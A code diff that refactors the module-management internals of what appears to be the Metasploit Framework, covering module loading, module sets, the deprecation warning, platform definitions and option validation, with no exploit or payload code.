+	# (see ClassMethods#deprecation_date)
+	def deprecation_date; self.class.deprecation_date; end
+
+	# Extends with {ClassMethods}
+	def self.included(base)
+		base.extend(ClassMethods)
+	end
+
+	def setup
+		print_warning("*"*72)
+		print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*")
+		if deprecation_date
+			print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
+		end
+		if replacement_module
+			print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
+		end
+		print_warning("*"*72)
+		super
+	end
+
+end

lib/msf/core/module/platform.rb

@@ -339,6 +339,14 @@ class Msf::Module::Platform
 		Alias = "java"
 	end
 
+	#
+	# Ruby
+	#
+	class Ruby < Msf::Module::Platform
+		Rank = 100
+		Alias = "ruby"
+	end
+
 	#
 	# Linux
 	#

lib/msf/core/module_manager.rb

@@ -12,11 +12,15 @@ require 'msf/core'
 require 'msf/core/module_set'
 
 module Msf
-  # Upper management decided to throw in some middle management # because the modules were getting out of hand.  This
-  # bad boy takes care of the work of managing the interaction with modules in terms of loading and instantiation.
+  # Upper management decided to throw in some middle management
+  # because the modules were getting out of hand.  This bad boy takes
+  # care of the work of managing the interaction with modules in terms
+  # of loading and instantiation.
   #
   # @todo add unload support
-  class ModuleManager < ModuleSet
+  class ModuleManager
+    include Msf::Framework::Offspring
+
     require 'msf/core/payload_set'
 
     # require here so that Msf::ModuleManager is already defined
@@ -32,6 +36,8 @@ module Msf
     include Msf::ModuleManager::ModuleSets
     include Msf::ModuleManager::Reloading
 
+    include Enumerable
+
     #
     # CONSTANTS
     #
@@ -39,36 +45,28 @@ module Msf
     # Maps module type directory to its module type.
     TYPE_BY_DIRECTORY = Msf::Modules::Loader::Base::DIRECTORY_BY_TYPE.invert
 
-    # Overrides the module set method for adding a module so that some extra steps can be taken to subscribe the module
-    # and notify the event dispatcher.
-    #
-    # @param (see Msf::ModuleSet#add_module)
-    # @return (see Msf::ModuleSet#add_module)
-    def add_module(mod, name, file_paths)
-      # Call {Msf::ModuleSet#add_module} with same arguments
-      dup = super
+    def [](key)
+      names = key.split("/")
+      type = names.shift
 
-      # Automatically subscribe a wrapper around this module to the necessary
-      # event providers based on whatever events it wishes to receive.  We
-      # only do this if we are the module manager instance, as individual
-      # module sets need not subscribe.
-      auto_subscribe_module(dup)
+      module_set = module_set_by_type[type]
 
-      # Notify the framework that a module was loaded
-      framework.events.on_module_load(name, dup)
-
-      dup
+      module_reference_name = names.join("/")
+      module_set[module_reference_name]
     end
 
     # Creates a module instance using the supplied reference name.
     #
-    # @param [String] name a module reference name.  It may optionally be prefixed with a "<type>/", in which case the
-    #   module will be created from the {Msf::ModuleSet} for the given <type>.
+    # @param name [String] A module reference name.  It may optionally
+    #   be prefixed with a "<type>/", in which case the module will be
+    #   created from the {Msf::ModuleSet} for the given <type>.
+    #   Otherwise, we step through all sets until we find one that
+    #   matches.
     # @return (see Msf::ModuleSet#create)
     def create(name)
       # Check to see if it has a module type prefix.  If it does,
       # try to load it from the specific module set for that type.
-      names = name.split(File::SEPARATOR)
+      names = name.split("/")
       potential_type_or_directory = names.first
 
       # if first name is a type
@@ -79,14 +77,36 @@ module Msf
         type = TYPE_BY_DIRECTORY[potential_type_or_directory]
       end
 
+      module_instance = nil
       if type
         module_set = module_set_by_type[type]
 
-        module_reference_name = names[1 .. -1].join(File::SEPARATOR)
-        module_set.create(module_reference_name)
-      # Otherwise, just try to load it by name.
+        # First element in names is the type, so skip it
+        module_reference_name = names[1 .. -1].join("/")
+        module_instance = module_set.create(module_reference_name)
       else
-        super
+        # Then we don't have a type, so we have to step through each set
+        # to see if we can create this module.
+        module_set_by_type.each do |_, set|
+          module_reference_name = names.join("/")
+          module_instance = set.create(module_reference_name)
+          break if module_instance
+        end
+      end
+
+      module_instance
+    end
+
+
+    # Iterate over all modules in all sets
+    #
+    # @yieldparam name [String] The module's reference name
+    # @yieldparam mod_class [Msf::Module] A module class
+    def each
+      module_set_by_type.each do |type, set|
+        set.each do |name, mod_class|
+          yield name, mod_class
+        end
       end
     end
 
@@ -113,18 +133,18 @@ module Msf
       types.each { |type|
         init_module_set(type)
       }
-
-      super(nil)
     end
 
     protected
 
-    # This method automatically subscribes a module to whatever event providers it wishes to monitor.  This can be used
-    # to allow modules to automatically # execute or perform other tasks when certain events occur.  For instance, when
-    # a new host is detected, other aux modules may wish to run such that they can collect more information about the
-    # host that was detected.
+    # This method automatically subscribes a module to whatever event
+    # providers it wishes to monitor.  This can be used to allow modules
+    # to automatically execute or perform other tasks when certain
+    # events occur.  For instance, when a new host is detected, other
+    # aux modules may wish to run such that they can collect more
+    # information about the host that was detected.
     #
-    # @param [Class] mod a Msf::Module subclass
+    # @param mod [Class] A subclass of Msf::Module
     # @return [void]
     def auto_subscribe_module(mod)
       # If auto-subscribe has been disabled
@@ -151,5 +171,6 @@ module Msf
         framework.events.add_session_subscriber((inst) ? inst : (inst = mod.new))
       end
     end
+
   end
 end

lib/msf/core/module_manager/cache.rb

@@ -24,8 +24,8 @@ module Msf::ModuleManager::Cache
   def load_cached_module(type, reference_name)
     loaded = false
 
-    module_info = self.module_info_by_path.values.find { |module_info|
-      module_info[:type] == type and module_info[:reference_name] == reference_name
+    module_info = self.module_info_by_path.values.find { |inner_info|
+      inner_info[:type] == type and inner_info[:reference_name] == reference_name
     }
 
     if module_info
@@ -116,8 +116,9 @@ module Msf::ModuleManager::Cache
 
         typed_module_set = module_set(type)
 
-        # Don't want to trigger as {Msf::ModuleSet#create} so check for key instead of using ||= which would call
-        # {Msf::ModuleSet#[]} which would potentially call {Msf::ModuleSet#create}.
+        # Don't want to trigger as {Msf::ModuleSet#create} so check for
+        # key instead of using ||= which would call {Msf::ModuleSet#[]}
+        # which would potentially call {Msf::ModuleSet#create}.
         unless typed_module_set.has_key? reference_name
           typed_module_set[reference_name] = Msf::SymbolicModule
         end
@@ -126,4 +127,4 @@ module Msf::ModuleManager::Cache
 
     self.module_info_by_path
   end
-end
+end

lib/msf/core/module_manager/loading.rb

@@ -57,21 +57,16 @@ module Msf::ModuleManager::Loading
   # categorized accordingly.
   #
   def on_module_load(mod, type, name, modinfo)
-    # Payload modules require custom loading as the individual files
-    # may not directly contain a logical payload that a user would
-    # reference, such as would be the case with a payload stager or
-    # stage.  As such, when payload modules are loaded they are handed
-    # off to a special payload set.  The payload set, in turn, will
-    # automatically create all the permutations after all the payload
-    # modules have been loaded.
+    dup = module_set_by_type[type].add_module(mod, name, modinfo)
 
-    if (type != Msf::MODULE_PAYLOAD)
-      # Add the module class to the list of modules and add it to the
-      # type separated set of module classes
-      add_module(mod, name, modinfo)
-    end
+    # Automatically subscribe a wrapper around this module to the necessary
+    # event providers based on whatever events it wishes to receive.
+    auto_subscribe_module(dup)
 
-    module_set_by_type[type].add_module(mod, name, modinfo)
+    # Notify the framework that a module was loaded
+    framework.events.on_module_load(name, dup)
+
+    dup
   end
 
   protected

lib/msf/core/module_manager/module_sets.rb

@@ -39,7 +39,7 @@ module Msf::ModuleManager::ModuleSets
     self.enablement_by_type[type] = true
     case type
       when Msf::MODULE_PAYLOAD
-        instance = Msf::PayloadSet.new(self)
+        instance = Msf::PayloadSet.new
       else
         instance = Msf::ModuleSet.new(type)
     end
@@ -100,4 +100,4 @@ module Msf::ModuleManager::ModuleSets
 
   attr_accessor :enablement_by_type # :nodoc:
   attr_accessor :module_set_by_type # :nodoc:
-end
+end

lib/msf/core/module_manager/reloading.rb

@@ -21,9 +21,6 @@ module Msf::ModuleManager::Reloading
   #
   # @return (see Msf::ModuleManager::Loading#load_modules)
   def reload_modules
-    self.module_history = {}
-    self.clear
-
     self.enablement_by_type.each_key do |type|
       module_set_by_type[type].clear
       init_module_set(type)
@@ -45,4 +42,4 @@ module Msf::ModuleManager::Reloading
 
     count_by_type
   end
-end
+end

lib/msf/core/module_set.rb

@@ -33,8 +33,9 @@ class Msf::ModuleSet < Hash
 
   # Create an instance of the supplied module by its name
   #
-  # @param [String] name the module reference name.
-  # @return [Msf::Module] instance of the named module.
+  # @param name [String] The module reference name.
+  # @return [Msf::Module,nil] Instance of the named module or nil if it
+  #   could not be created.
   def create(name)
     klass = fetch(name, nil)
     instance = nil
@@ -42,15 +43,7 @@ class Msf::ModuleSet < Hash
     # If there is no module associated with this class, then try to demand
     # load it.
     if klass.nil? or klass == Msf::SymbolicModule
-      # If we are the root module set, then we need to try each module
-      # type's demand loading until we find one that works for us.
-      if module_type.nil?
-        Msf::MODULE_TYPES.each { |type|
-          framework.modules.load_cached_module(type, name)
-        }
-      else
-        framework.modules.load_cached_module(module_type, name)
-      end
+      framework.modules.load_cached_module(module_type, name)
 
       recalculate
 
@@ -168,17 +161,6 @@ class Msf::ModuleSet < Hash
   def on_module_reload(mod)
   end
 
-  # @!attribute [rw] postpone_recalc
-  #   Whether or not recalculations should be postponed.  This is used
-  #   from the context of the {#each_module_list} handler in order to
-  #   prevent the demand loader from calling recalc for each module if
-  #   it's possible that more than one module may be loaded.  This field
-  #   is not initialized until used.
-  #
-  #   @return [true] if {#recalculate} should not be called immediately
-  #   @return [false] if {#recalculate} should be called immediately
-  attr_accessor :postpone_recalculate
-
   # Dummy placeholder to recalculate aliases and other fun things.
   #
   # @return [void]
@@ -194,8 +176,6 @@ class Msf::ModuleSet < Hash
     (self[name]) ? true : false
   end
 
-  protected
-
   # Adds a module with a the supplied name.
   #
   # @param [Class] mod The module class: a subclass of Msf::Module.
@@ -226,25 +206,24 @@ class Msf::ModuleSet < Hash
     mod
   end
 
+  protected
+
   # Load all modules that are marked as being symbolic.
   #
   # @return [void]
   def demand_load_modules
+    found_symbolics = false
     # Pre-scan the module list for any symbolic modules
     self.each_pair { |name, mod|
       if (mod == Msf::SymbolicModule)
-        self.postpone_recalculate = true
-
+        found_symbolics = true
         mod = create(name)
-
         next if (mod.nil?)
       end
     }
 
     # If we found any symbolic modules, then recalculate.
-    if (self.postpone_recalculate)
-      self.postpone_recalculate = false
-
+    if (found_symbolics)
       recalculate
     end
   end
@@ -326,7 +305,6 @@ class Msf::ModuleSet < Hash
   #
   #   @return [String] type of modules
   attr_writer   :module_type
-  attr_accessor :module_history
 
   # Ranks modules based on their constant rank value, if they have one.  Modules without a Rank are treated as if they
   # had {Msf::NormalRanking} for Rank.

lib/msf/core/modules/loader/base.rb

@@ -63,15 +63,17 @@ class Msf::Modules::Loader::Base
   # Regex that can distinguish regular ruby source from unit test source.
   UNIT_TEST_REGEX = /rb\.(ut|ts)\.rb$/
 
-  # @param [Msf::ModuleManager] module_manager The module manager that caches the loaded modules.
+  # @param [Msf::ModuleManager] module_manager The module manager that
+  #   caches the loaded modules.
   def initialize(module_manager)
     @module_manager = module_manager
   end
 
   # Returns whether the path can be loaded this module loader.
   #
-  # @abstract Override and determine from properties of the path or the file to which the path points whether it is
-  #   loadable using {#load_modules} for the subclass.
+  # @abstract Override and determine from properties of the path or the
+  #   file to which the path points whether it is loadable using
+  #   {#load_modules} for the subclass.
   #
   # @param path (see #load_modules)
   # @return [Boolean]
@@ -81,22 +83,33 @@ class Msf::Modules::Loader::Base
 
   # Loads a module from the supplied path and module_reference_name.
   #
-  # @param [String] parent_path The path under which the module exists.  This is not necessarily the same path as passed
-  #   to {#load_modules}: it may just be derived from that path.
+  # @param [String] parent_path The path under which the module exists.
+  #   This is not necessarily the same path as passed to
+  #   {#load_modules}: it may just be derived from that path.
   # @param [String] type The type of module.
-  # @param [String] module_reference_name The canonical name for referring to the module.
-  # @param [Hash] options Options used to force loading and track statistics
-  # @option options [Hash{String => Integer}] :count_by_type Maps the module type to the number of module loaded
-  # @option options [Boolean] :force (false) whether to force loading of the module even if the module has not changed.
-  # @option options [Hash{String => Boolean}] :recalculate_by_type Maps type to whether its
-  #   {Msf::ModuleManager::ModuleSets#module_set} needs to be recalculated.
+  # @param [String] module_reference_name The canonical name for
+  #   referring to the module.
+  # @param [Hash] options Options used to force loading and track
+  #   statistics
+  # @option options [Hash{String => Integer}] :count_by_type Maps the
+  #   module type to the number of module loaded
+  # @option options [Boolean] :force (false) whether to force loading of
+  #   the module even if the module has not changed.
+  # @option options [Hash{String => Boolean}] :recalculate_by_type Maps
+  #   type to whether its {Msf::ModuleManager::ModuleSets#module_set}
+  #   needs to be recalculated.
   # @option options [Boolean] :reload (false) whether this is a reload.
+  #
   # @return [false] if :force is false and parent_path has not changed.
-  # @return [false] if exception encountered while parsing module content
-  # @return [false] if the module is incompatible with the Core or API version.
-  # @return [false] if the module does not implement a Metasploit(\d+) class.
+  # @return [false] if exception encountered while parsing module
+  #   content
+  # @return [false] if the module is incompatible with the Core or API
+  #   version.
+  # @return [false] if the module does not implement a Metasploit(\d+)
+  #   class.
   # @return [false] if the module's is_usable method returns false.
-  # @return [true] if all those condition pass and the module is successfully loaded.
+  # @return [true] if all those condition pass and the module is
+  #   successfully loaded.
   #
   # @see #read_module_content
   # @see Msf::ModuleManager::Loading#file_changed?
@@ -121,8 +134,8 @@ class Msf::Modules::Loader::Base
     module_content = read_module_content(parent_path, type, module_reference_name)
 
     if module_content.empty?
-	    # read_module_content is responsible for calling {#load_error}, so just return here.
-	    return false
+      # read_module_content is responsible for calling {#load_error}, so just return here.
+      return false
     end
 
     try_eval_module = lambda { |namespace_module|
@@ -139,9 +152,9 @@ class Msf::Modules::Loader::Base
         begin
           namespace_module.version_compatible!(module_path, module_reference_name)
         rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error
-	        load_error(module_path, version_compatibility_error)
+          load_error(module_path, version_compatibility_error)
         else
-	        load_error(module_path, error)
+          load_error(module_path, error)
         end
 
         return false
@@ -150,17 +163,17 @@ class Msf::Modules::Loader::Base
       begin
         namespace_module.version_compatible!(module_path, module_reference_name)
       rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error
-	      load_error(module_path, version_compatibility_error)
+        load_error(module_path, version_compatibility_error)
 
         return false
       end
 
       begin
-	      metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name)
+        metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name)
       rescue Msf::Modules::MetasploitClassCompatibilityError => error
-	      load_error(module_path, error)
+        load_error(module_path, error)
 
-	      return false
+        return false
       end
 
       unless usable?(metasploit_class)
@@ -227,12 +240,15 @@ class Msf::Modules::Loader::Base
 
   # Loads all of the modules from the supplied path.
   #
-  # @note Only paths where {#loadable?} returns true should be passed to this method.
+  # @note Only paths where {#loadable?} returns true should be passed to
+  #   this method.
   #
   # @param [String] path Path under which there are modules
   # @param [Hash] options
-  # @option options [Boolean] force (false) whether to force loading of the module even if the module has not changed.
-  # @return [Hash{String => Integer}] Maps module type to number of modules loaded
+  # @option options [Boolean] force (false) Whether to force loading of
+  #   the module even if the module has not changed.
+  # @return [Hash{String => Integer}] Maps module type to number of
+  #   modules loaded
   def load_modules(path, options={})
     options.assert_valid_keys(:force)
 
@@ -396,28 +412,28 @@ class Msf::Modules::Loader::Base
     raise ::NotImplementedError
   end
 
-	# Records the load error to {Msf::ModuleManager::Loading#module_load_error_by_path} and the log.
-	#
-	# @param [String] module_path Path to the module as returned by {#module_path}.
-	# @param [Exception, #class, #to_s, #backtrace] error the error that cause the module not to load.
-	# @return [void]
-	#
-	# @see #module_path
-	def load_error(module_path, error)
-		# module_load_error_by_path does not get the backtrace because the value is echoed to the msfconsole where
-		# backtraces should not appear.
-	  module_manager.module_load_error_by_path[module_path] = "#{error.class} #{error}"
+  # Records the load error to {Msf::ModuleManager::Loading#module_load_error_by_path} and the log.
+  #
+  # @param [String] module_path Path to the module as returned by {#module_path}.
+  # @param [Exception, #class, #to_s, #backtrace] error the error that cause the module not to load.
+  # @return [void]
+  #
+  # @see #module_path
+  def load_error(module_path, error)
+    # module_load_error_by_path does not get the backtrace because the value is echoed to the msfconsole where
+    # backtraces should not appear.
+    module_manager.module_load_error_by_path[module_path] = "#{error.class} #{error}"
 
-		log_lines = []
-	  log_lines << "#{module_path} failed to load due to the following error:"
-		log_lines << error.class.to_s
-		log_lines << error.to_s
-		log_lines << "Call stack:"
-		log_lines += error.backtrace
+    log_lines = []
+    log_lines << "#{module_path} failed to load due to the following error:"
+    log_lines << error.class.to_s
+    log_lines << error.to_s
+    log_lines << "Call stack:"
+    log_lines += error.backtrace
 
-		log_message = log_lines.join("\n")
-		elog(log_message)
-	end
+    log_message = log_lines.join("\n")
+    elog(log_message)
+  end
 
   # @return [Msf::ModuleManager] The module manager for which this loader is loading modules.
   attr_reader :module_manager
@@ -480,11 +496,14 @@ class Msf::Modules::Loader::Base
     namespace_module_name
   end
 
-  # Returns an Array of names to make a fully qualified module name to wrap the Metasploit(1|2|3) class so that it
-  # doesn't overwrite other (metasploit) module's classes.  Invalid module name characters are escaped by using 'H*'
-  # unpacking and prefixing each code with X so the code remains a valid module name when it starts with a digit.
+  # Returns an Array of names to make a fully qualified module name to
+  # wrap the Metasploit(1|2|3) class so that it doesn't overwrite other
+  # (metasploit) module's classes.  Invalid module name characters are
+  # escaped by using 'H*' unpacking and prefixing each code with X so
+  # the code remains a valid module name when it starts with a digit.
   #
-  # @param [String] uniq_module_reference_name The unique canonical name for the module including type.
+  # @param [String] uniq_module_reference_name The unique canonical name
+  #   for the module including type.
   # @return [Array<String>] {NAMESPACE_MODULE_NAMES} + <derived-constant-safe names>
   #
   # @see namespace_module
@@ -513,8 +532,9 @@ class Msf::Modules::Loader::Base
     end
 
     namespace_module = create_namespace_module(namespace_module_names)
-    # Get the parent module from the created module so that restore_namespace_module can remove namespace_module's
-    # constant if needed.
+    # Get the parent module from the created module so that
+    # restore_namespace_module can remove namespace_module's constant if
+    # needed.
     parent_module = namespace_module.parent
 
     begin
@@ -557,21 +577,21 @@ class Msf::Modules::Loader::Base
     if parent_module
       # If there is a current module with relative_name
       if parent_module.const_defined?(relative_name)
-	      # if the current value isn't the value to be restored.
-	      if parent_module.const_get(relative_name) != namespace_module
-		      # remove_const is private, so use send to bypass
-		      parent_module.send(:remove_const, relative_name)
+        # if the current value isn't the value to be restored.
+        if parent_module.const_get(relative_name) != namespace_module
+          # remove_const is private, so use send to bypass
+          parent_module.send(:remove_const, relative_name)
 
-		      # if there was a previous module, not set it to the name
-		      if namespace_module
-			      parent_module.const_set(relative_name, namespace_module)
-		      end
-	      end
+          # if there was a previous module, not set it to the name
+          if namespace_module
+            parent_module.const_set(relative_name, namespace_module)
+          end
+        end
       else
-	      # if there was a previous module, but there isn't a current module, then restore the previous module
-	      if namespace_module
-		      parent_module.const_set(relative_name, namespace_module)
-	      end
+        # if there was a previous module, but there isn't a current module, then restore the previous module
+        if namespace_module
+          parent_module.const_set(relative_name, namespace_module)
+        end
       end
     end
   end

lib/msf/core/option_container.rb

@@ -302,6 +302,10 @@ class OptPort < OptBase
 		return 'port'
 	end
 
+	def normalize(value)
+		value.to_i
+	end
+
 	def valid?(value)
 		return false if empty_required_value?(value)
 
@@ -439,9 +443,10 @@ class OptInt < OptBase
 	end
 
 	def valid?(value)
+		return super if !required? and value.to_s.empty?
 		return false if empty_required_value?(value)
 
-		if value and not normalize(value).to_s.match(/^\d+$/)
+		if value and not value.to_s.match(/^0x[0-9a-fA-F]+$|^-?\d+$/)
 			return false
 		end
 
@@ -469,7 +474,7 @@ class OptRegexp < OptBase
 			Regexp.compile(value)
 
 			return true
-		rescue RegexpError => e
+		rescue RegexpError
 			return false
 		end
 	end